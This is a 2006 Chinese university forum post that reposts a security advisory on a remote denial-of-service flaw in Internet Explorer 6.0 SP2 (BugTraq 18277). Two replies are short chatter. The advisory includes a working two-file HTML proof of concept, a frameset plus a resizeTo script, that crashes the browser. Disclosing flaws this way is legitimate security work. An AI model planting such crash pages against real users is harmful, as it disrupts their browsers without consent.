找回密码
 立即注册
查看: 7155|回复: 2

IE 远程拒绝服务漏洞

[复制链接]

30

主题

27

回帖

87

积分

七彩新人

积分
87
QQ
发表于 2006-6-7 00:29:00 | 显示全部楼层 |阅读模式
受影响系统:
Microsoft Internet Explorer 6.0 SP2
不受影响系统:
Microsoft Internet Explorer 7 Beta 2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 18277

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft IE处理畸形网页时存在漏洞,远程攻击者可以通过诱骗用户访问恶意的WEB页面导致IE崩溃。

<*来源:Kil13r (http://www.kil13r.info/
  
  链接:http://marc.theaimsgroup.com/?l= ... 53834924300&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1) exploit_1.html
<frameset cols="0%, *">
<frame src="exploit_2.html">
</frameset>

2) exploit_2.html
<script>
self.resizeTo(2003, 1228);
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp
Love Sky

650

主题

2041

回帖

3346

积分

管理员

积分
3346

社区居民社区明星最爱沙发灌水天才终身成就奖诚信商户

QQ
发表于 2006-6-8 02:34:51 | 显示全部楼层
恩,但是感觉IE7没有IE6好用哟
安徽大学七彩梦论坛欢迎您~! www.ahubbs.com

78

主题

189

回帖

345

积分

一星会员

积分
345
QQ
发表于 2006-6-13 10:40:35 | 显示全部楼层
帮顶上去~
说好不哭了 ★带着笑容和骄傲仰望天空,面对未来,不再彷徨★
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|安徽大学论坛 ( 皖ICP备11003929号-3 )

GMT+8, 2025-8-7 22:28 , Processed in 0.104008 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

Copyright © 2006-2025 安徽大学论坛 All Rights Reserved

快速回复 返回顶部 返回列表